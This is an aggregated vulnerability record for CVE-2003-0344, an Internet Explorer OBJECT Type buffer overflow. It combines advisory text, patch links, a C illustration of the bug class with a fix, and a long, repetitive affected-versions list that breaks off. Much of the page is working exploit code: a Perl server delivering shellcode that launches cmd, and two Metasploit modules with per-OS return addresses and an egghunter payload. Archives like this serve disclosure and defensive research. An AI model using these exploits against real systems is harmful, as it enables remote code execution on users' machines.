CVE-2003-0344
CVSS 7.5
Published: 2003-06-16 00:00:00
Revised: 2016-10-17 22:32:50

[Original] Buffer overflow in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to execute arbitrary code via / (slash) characters in the Type property of an Object tag in a web page.


[CNNVD] Microsoft Internet Explorer Object Type Property Buffer Overflow Vulnerability (MS03-020) (CNNVD-200306-069)

        
        The "Object" tag inserts objects such as ActiveX components into an HTML page. The "Type" attribute of the "Object" tag sets or gets the object's MIME type; typical legitimate values include "text/plain", "application/hta" and "audio/x-mpeg".
        The "Type" attribute of the "Object" tag is subject to a buffer overflow. A remote attacker can exploit it by building a malicious page and enticing a user to visit it, potentially executing arbitrary code on the system with the user's privileges.
        The value of the "Type" attribute is checked against the bounds of its buffer, but a special character bypasses that check. The attacker builds an object similar to the following (only the element's inner text survived extraction; the markup carrying the attribute value is missing):
        Cooler Than Centra Spike
        The value uses '/' characters. After the string has passed the bounds check, the system converts each '/' into the three characters '_/_'; this expansion makes the string overflow the bounded buffer. Carefully crafted attribute data can take control of program flow and may execute arbitrary instructions with the privileges of the user's process.
        An attacker can build a malicious web page, or an HTML-format email, and entice the user to open it to trigger this vulnerability.
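The bug class described above, "length checked before expansion", as an added example in C; this is not code from the advisory or from any of the exploits on this page. The 64-byte destination buffer, the function names and the constructed sample input are assumptions chosen to mirror the description; the 3-byte '_/_' expansion of '/' follows the text. The vulnerable routine is written so the overrun is measured into an oversized backing buffer rather than corrupting memory.

```c
/* Added example: the MS03-020 bug class, "length checked before expansion".
 * Not code from the advisory or the exploits on this page.  Assumptions:
 * a 64-byte fixed buffer, the function names, the constructed sample input.
 * Build: cc -std=c99 expand.c */
#include <stdio.h>
#include <string.h>

#define TYPE_BUF_SIZE 64            /* assumed size of the fixed buffer */
#define SLASH_EXPANSION "_/_"       /* what each '/' becomes after the check */

/* Length of `in` once every '/' has been widened to SLASH_EXPANSION
 * (terminator not counted).  This is the number a correct check must use. */
size_t expanded_len(const char *in)
{
    size_t n = 0;
    for (; *in; in++)
        n += (*in == '/') ? strlen(SLASH_EXPANSION) : 1;
    return n;
}

/* The copy loop both versions share: it has no bounds check of its own. */
static size_t expand_into(const char *in, char *out)
{
    size_t w = 0;
    for (; *in; in++) {
        if (*in == '/') {
            memcpy(out + w, SLASH_EXPANSION, strlen(SLASH_EXPANSION));
            w += strlen(SLASH_EXPANSION);
        } else {
            out[w++] = *in;
        }
    }
    out[w++] = '\0';
    return w;                       /* bytes written, terminator included */
}

/* Vulnerable pattern: validates the raw input length against `declared`
 * (the size the caller believes `out` has), then expands without
 * re-checking.  Returns bytes actually written, or 0 if the raw check
 * rejects.  Only pass a backing buffer large enough for the expansion so
 * the overrun is measurable instead of corrupting memory. */
size_t vulnerable_expand(const char *in, char *out, size_t declared)
{
    if (strlen(in) + 1 > declared)  /* accepts 56 raw bytes, writes 152 */
        return 0;
    return expand_into(in, out);
}

/* Fixed pattern: bound the post-expansion length, then copy. */
size_t safe_expand(const char *in, char *out, size_t outsz)
{
    if (expanded_len(in) + 1 > outsz)
        return 0;
    return expand_into(in, out);
}

/* Constructed sample shaped like the PoC further down this page: 8 filler
 * bytes followed by 48 slashes.  Raw length 56 passes a 64-byte check;
 * the expanded length is 8 + 48 * 3 = 152. */
static void sample_type_attr(char dst[64])
{
    memset(dst, 'A', 8);
    memset(dst + 8, '/', 48);
    dst[56] = '\0';
}

/* Bytes the vulnerable copy writes for the sample: 153, i.e. 89 bytes past
 * the 64-byte buffer it believed it had. */
size_t demo_vulnerable_bytes_written(void)
{
    char in[64], backing[512];      /* oversized so the overrun is observable */
    sample_type_attr(in);
    return vulnerable_expand(in, backing, TYPE_BUF_SIZE);
}

/* The fixed version refuses the same input and returns 0. */
size_t demo_safe_bytes_written(void)
{
    char in[64], out[TYPE_BUF_SIZE];
    sample_type_attr(in);
    return safe_expand(in, out, sizeof out);
}

/* A benign MIME type still round-trips through the fixed version. */
int demo_safe_roundtrip(void)
{
    char out[TYPE_BUF_SIZE];
    return safe_expand("text/html", out, sizeof out) == 12
        && strcmp(out, "text_/_html") == 0;
}

int main(void)
{
    printf("vulnerable: wrote %zu bytes into a %d-byte buffer\n",
           demo_vulnerable_bytes_written(), TYPE_BUF_SIZE);
    printf("fixed: wrote %zu bytes (0 = rejected)\n", demo_safe_bytes_written());
    return demo_safe_roundtrip() ? 0 : 1;
}
```

The fix is not "check harder"; it is to check the quantity that is actually written. Any transformation that can grow its input (escaping, encoding, wide-char conversion) must be sized after the transformation, or the copy must be bounded by the destination rather than by the source.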
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:microsoft:ie:6.0    Microsoft Internet Explorer 6.0
cpe:/a:microsoft:ie:5.01    Microsoft Internet Explorer 5.01
cpe:/a:microsoft:ie:5.5    Microsoft Internet Explorer 5.5
cpe:/a:microsoft:ie:6.0::windows_server_2003    Microsoft Internet Explorer 6.0 on Windows Server 2003

- OVAL (technical details for detection)

oval:org.mitre.oval:def:922    IE Slash Characters in Type Property Vulnerability
*OVAL describes in detail how to detect this vulnerability; see the OVAL definition above for the technical details of the check.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0344
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0344
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-069
(official data source) CNNVD

- Other links and resources

http://lists.grok.org.uk/pipermail/full-disclosure/2003-July/006401.html
(UNKNOWN)  FULLDISC  20030709 IE Object Type Overflow Exploit
http://marc.info/?l=bugtraq&m=105476381609135&w=2
(UNKNOWN)  BUGTRAQ  20030604 Internet Explorer Object Type Property Overflow
http://www.eeye.com/html/Research/Advisories/AD20030604.html
(VENDOR_ADVISORY)  EEYE  AD20030604
http://www.kb.cert.org/vuls/id/679556
(UNKNOWN)  CERT-VN  VU#679556
http://www.microsoft.com/technet/security/bulletin/ms03-020.asp
(VENDOR_ADVISORY)  MS  MS03-020

- Vulnerability information

Microsoft Internet Explorer Object Type Property Buffer Overflow Vulnerability (MS03-020)
Severity: High    Type: Boundary condition error
Published: 2003-06-16 00:00:00    Updated: 2005-10-20 00:00:00
Remote
        

- Advisories and patches

        Vendor patch:
        Microsoft
        ---------
        Microsoft has released a security bulletin (MS03-020) and the corresponding patch:
        MS03-020: Cumulative Patch for Internet Explorer (818529)
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS03-020.asp

        Patch download:
        * All IE6 patches except Windows Server 2003:
        
        http://www.microsoft.com/windows/ie/downloads/critical/818529/default.asp

        * Microsoft Internet Explorer 6.0 for Windows Server 2003
        
        http://www.microsoft.com/windows/ie/downloads/critical/818529s/default.asp

- Vulnerability information (37)

MS Internet Explorer Object Tag Exploit (MS03-020) (EDBID:37)
windows remote
2003-06-07 Verified
0 alumni
#!/usr/bin/perl

#
#  Proof of concept exploit on IE 5.x - 6.x by Alumni
#  IE-Object longtype dynamic call overflow
#
#  url://<$shellcode><'/'x48><jmp %ptr_sh>
#  the flaw actually exists in URLMON.DLL when converting backslashes
#  to wide char, this can be seen on stack dump near '&CLSID=AAA...2F__2F__...'.
#
#  To exploit:  i)  start server perl script;
#               ii) connect to http-service using IE/5.x.
#                   a) the shellcode size is limited up to 56 bytes;
#                   b) the '$ret' may differ as well as the image base of KERNEL32.DLL;
#                   c) to avoid multiple encoding the shellcode is given 'as is' with help of JScript.
#

use IO::Socket;

$port = 80;
$server = IO::Socket::INET->new (LocalPort => $port,
				Type =>SOCK_STREAM,
				Reuse => 1,
				Listen => $port) or die("Couldn't create server socket\n");


$shellcode = 	"\x33\xdb".		# xor ebx, ebx
		"\x8b\xd4".		# mov edx, esp
		"\x80\xc6\xff".		# add dh, 0xFF
		"\xc7\x42\xfc\x63\x6d".	# mov dword ptr[edx-4], 0x01646D63 ("cmd\x01")
		"\x64\x01".		#
		"\x88\x5a\xff".		# mov byte ptr[edx-1], bl
		"\x8d\x42\xfc".		# lea eax, [edx-4]
		"\x8b\xf5".		# mov esi, ebp
		"\x56\x52".		# push esi; push edx
		"\x53\x53\x53\x53\x53\x53".	# push ebx
		"\x50\x53".		# push eax; push ebx
		"\xb8\x41\x77\xf7\xbf".	# mov eax, 0xBFF77741 ~= CreateProcessA
		"\xff\xd0".		# call eax
		"\xb8\xf8\xd4\xf8\xbf".	# mov eax, 0xBFF8D4F8 ~= ExitProcess
		"\xff\xd0".		# call eax
		"\xcc";			# int 3

$nop = "\x90";
$ret = "\\xAB\\x5D\\x58";


while ($client = $server->accept()) {
	while (<$client>) {
		if ($_ =~ /^(\x0D\x0A)/) {

print $client <<END_DATA;
HTTP/1.0 200 Ok\r
Content-Type: text/html\r
\r
<script>\r
	var mins = 56;\r
	var size = 48;\r
	var sploit = "$shellcode";\r
	var strNop = "$nop";\r
	var strObj = '<object type="';\r
	for (i=0;i<mins-sploit.length;i++) strObj += strNop;\r
	strObj += sploit;\r
	for (i=0;i<size;i++) strObj += '/';\r
	strObj += "CCCCCCCCDDDDDDDD";\r
	strObj += "$ret";\r
	strObj += '">Hello</object>';\r
	alert(strObj);\r
	document.write(strObj);\r
</script>\r
END_DATA
			close($client);

		}
	}
}

close($server);

# milw0rm.com [2003-06-07]
		

- Vulnerability information (16581)

MS03-020 Internet Explorer Object Type (EDBID:16581)
windows remote
2010-08-25 Verified
0 metasploit
##
# $Id: ms03_020_ie_objecttype.rb 10150 2010-08-25 20:55:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Egghunter

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name      => HttpClients::IE,
		:javascript   => false,
		:os_name      => OperatingSystems::WINDOWS,
		:vuln_test    => nil, # no way to test without just trying it
		:prefix_html  => "<!--[if lt IE 7]>",
		:postfix_html => "<![endif]-->",
		:rank         => NormalRanking  # reliable memory corruption
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MS03-020 Internet Explorer Object Type',
			'Description'    => %q{
					This module exploits a vulnerability in Internet Explorer's
				handling of the OBJECT type attribute.
			},
			'Author'         => 'skape',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10150 $',
			'References'     =>
				[
					[ 'CVE', '2003-0344' ],
					[ 'OSVDB', '2967'    ],
					[ 'BID', '7806'      ],
					[ 'MSB', 'MS03-020'  ],
				],
			'Payload'        =>
				{
					'Space'    => 1000,
					'MaxNops'  => 0,
					'BadChars' => "\x8b\xe2", # Prevent UTF-8-ification
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					# Target 0: Automatic
					[
						'Windows NT/XP/2003 Automatic',
						{
							'Platform' => 'win',
							'Rets'     =>
								[
									0x777e85ab, # Windows NT: samlib jmp esp
									0x71ab1d54, # Windows XP: ws2_32 push esp/ret SP0/1
									0x77d1f92f, # Windows 2003: user32 jmp esp SP0/1
								],
						},
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jun 04 2003'))
	end

	def on_request_uri(cli, request)
		clean = 0x7ffdec50
		ret   = nil

		# Figure out which return address to use based on the user-agent
		case request['User-Agent']
			when /Windows NT 5.2/
				ret = target['Rets'][2]
			when /Windows NT 5.1/
				ret = target['Rets'][1]
			when /Windows NT/
				ret = target['Rets'][0]
			else
				print_status("Sending 404 to user agent: #{request['User-Agent']}")
				cli.send_response(create_response(404, 'File not found'))
				return
		end

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Pack the values
		ret    = [ ret   ].pack('V')
		clean  = [ clean ].pack('V')
		hunter = generate_egghunter(p.encoded, payload_badchars, { :checksum => true })
		egg    = hunter[1]

		# Now, build out the HTTP response payload
		content =
			"<html>" + egg + "\n" +
			"<object type=\"////////////////////////////////////////////////////////////////" +
			rand_text_alphanumeric(8) + ret + clean +
			make_nops(8) + hunter[0] + "\">" +
			"</object>" +
			"</html>"

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
		

- Vulnerability information (22726)

Microsoft Internet Explorer 5 OBJECT Tag Buffer Overflow Vulnerability (EDBID:22726)
windows remote
2003-06-04 Verified
0 FelineMenace
source: http://www.securityfocus.com/bid/7806/info

Microsoft Internet Explorer is prone to a boundary condition error when handling OBJECT tags in web pages. When a vulnerable client encounters a web page containing an OBJECT tag with a parameter holding excessive data, an internal memory buffer is overrun. This could cause Internet Explorer to fail or potentially result in the execution of arbitrary code in the security context of the current user.

http://www.exploit-db.com/sploits/22726.tar		

- Vulnerability information (F83150)

MS03-020 Internet Explorer Object Type (PacketStormID:F83150)
2009-11-26 00:00:00
skape  metasploit.com
exploit
CVE-2003-0344

This Metasploit module exploits a vulnerability in Internet Explorer's handling of the OBJECT type attribute.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Egghunter

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name      => HttpClients::IE,
		:javascript   => false, 
		:os_name      => OperatingSystems::WINDOWS,
		:vuln_test    => nil, # no way to test without just trying it
		:prefix_html  => "<!--[if lt IE 7]>",
		:postfix_html => "<![endif]-->",
		:rank         => NormalRanking  # reliable memory corruption
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MS03-020 Internet Explorer Object Type',
			'Description'    => %q{
				This module exploits a vulnerability in Internet Explorer's
				handling of the OBJECT type attribute.
			},
			'Author'         => 'skape',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '2003-0344' ],
					[ 'OSVDB', '2967'    ],
					[ 'BID', '7806'      ],
					[ 'MSB', 'MS03-020'  ],
				],
			'Payload'        =>
				{
					'Space'    => 1000,
					'MaxNops'  => 0,
					'BadChars' => "\x8b\xe2", # Prevent UTF-8-ification
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					# Target 0: Automatic
					[
						'Windows NT/XP/2003 Automatic',
						{
							'Platform' => 'win',
							'Rets'     =>
								[
									0x777e85ab, # Windows NT: samlib jmp esp
									0x71ab1d54, # Windows XP: ws2_32 push esp/ret SP0/1
									0x77d1f92f, # Windows 2003: user32 jmp esp SP0/1
								],
						},
					],
				],
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
		clean = 0x7ffdec50
		ret   = nil

		# Figure out which return address to use based on the user-agent
		case request['User-Agent']
			when /Windows NT 5.2/
				ret = target['Rets'][2]
			when /Windows NT 5.1/
				ret = target['Rets'][1]
			when /Windows NT/
				ret = target['Rets'][0]
			else
				print_status("Sending 404 to user agent: #{request['User-Agent']}")
				cli.send_response(create_response(404, 'File not found'))
				return
		end

		# Re-generate the payload 
		return if ((p = regenerate_payload(cli)) == nil)

		# Pack the values
		ret    = [ ret   ].pack('V')
		clean  = [ clean ].pack('V')
		hunter = generate_egghunter()
		egg    = hunter[1]

		# Now, build out the HTTP response payload
		content = 
			"<html>" + egg + egg + p.encoded + "\n" +
			"<object type=\"////////////////////////////////////////////////////////////////" +
			rand_text_alphanumeric(8) + ret + clean +
			make_nops(8) + hunter[0] + "\">" +
			"</object>" +
			"</html>"

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)		
	end

end
    

- Vulnerability information

OSVDB ID: 2967
Microsoft IE Object Type Property Overflow
Location: Remote / Network Access
Attack type: Input Manipulation
Impact: Loss of Integrity
Solution: Patch / RCS
Exploit: Public
Disclosure: Vendor Verified

- Vulnerability description

Microsoft Internet Explorer contains a flaw in the way it handles certain "Object" tags. The flaw is triggered by a buffer overflow in the "Type" property of the "Object" tag. While there are some sanity checks on buffer input, these can be circumvented using special characters. The attack may be used wherever IE parses HTML, so this vulnerability affects newsgroups, mailing lists and websites alike.

- Timeline

2003-06-04 Unknown
2003-06-04 2003-06-04

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability author

- Vulnerability information

Microsoft Internet Explorer OBJECT Tag Buffer Overflow Vulnerability
Class: Boundary Condition Error
Bugtraq ID: 7806
Remote: Yes
Local: No
Published: 2003-06-04 12:00:00
Updated: 2009-07-11 10:06:00
Credit: Discovery of this vulnerability has been credited to Drew Copley of eEye Digital Security. Discovery of the language-specific variant has been credited to Yuu Arai.

- Affected program versions

Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
